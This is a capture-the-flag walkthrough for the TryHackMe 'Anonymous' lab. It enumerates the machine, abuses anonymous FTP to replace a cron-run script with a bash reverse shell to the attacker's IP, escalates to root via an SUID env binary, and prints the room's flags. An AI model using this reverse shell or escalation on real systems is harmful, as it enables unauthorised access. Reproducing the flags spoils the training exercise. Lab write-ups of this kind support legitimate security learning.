Anonymous: TryHackMe Walkthrough Writeup.
Task 1: Pwn
#1. Enumerate the machine. How many ports are open?
Answer: 4
nmap -vvv 10.10.197.76
#2. What service is running on port 21?
Answer: ftp
As we can see in the above image that ftp is running on port 21.
#3. What service is running on ports 139 and 445?
Answer: smb
nmap -A 10.10.197.76
#4. There’s a share on the user’s computer. What’s it called?
Answer: pics
For this task we can use enum4linux, use the “-S” option to display the shares running on the user’s computer:
./enum4linux.pl -S 10.10.197.76
#5. user.txt
Answer: 90d6f992585815ff991e68748c414740
To find the user.txt file we can connect to the ftp service that is running, using the anonymous login.
Anonymous File Transfer Protocol (FTP) allows people to download public files from a remote server or website without needing to log in with a specific account. They use an FTP program or command, enter “anonymous” as the username, and either use a given password or make one up or just simply press “Enter”.
I used the get command with a dash at the end to read the clean.sh file directly on the system instead of downloading it as shown below:
get clean.sh -
Upon exploring the scripts directory we can see that we have a file named “clean.sh” and we have read write execute access. The script is designed to inspect the tmp directory, delete files, and record the results in the removed_files.log file. Based on the log’s contents, it appears that the clean.sh script executes quite frequently, possibly every minute. We need to create our own clean.sh script and upload it to the FTP server in hopes that the cronjob will run our script instead of the existing cleanup script.
So, now we can create our own clean.sh file locally adding the command shown below and then putthe file on the server.
#!/bin/bash
bash -i >& /dev/tcp/"YOUR_IP"/4444 0>&1
Now, log back into the FTP server and PUT the file, using the command:
ftp 10.10.197.76
cd scripts
put clean.sh
Start the netcat listener in another terminal using the command:
nc -lvnp 4444
Wait for a minute or so and you will get something like shown below:
Here we get the user.txt file and the flag is “90d6f992585815ff991e68748c414740”.
#6. root.txt
Answer: 4d930091c31a622a7ed10f27999af363
Privelege Escalation: To get the root level permission I checked what programs were owned by root with the SUID bit set. To get a list of all SUID binaries, execute the following command:
find / -user root -perm -u=s 2>/dev/null
Searching on GTFOBins (https://gtfobins.github.io/gtfobins/env/) we get a potential privilege escalation:
So run the following command:
env /bin/sh -p
And Voila! We get the root.txt file with the flag “4d930091c31a622a7ed10f27999af363”.
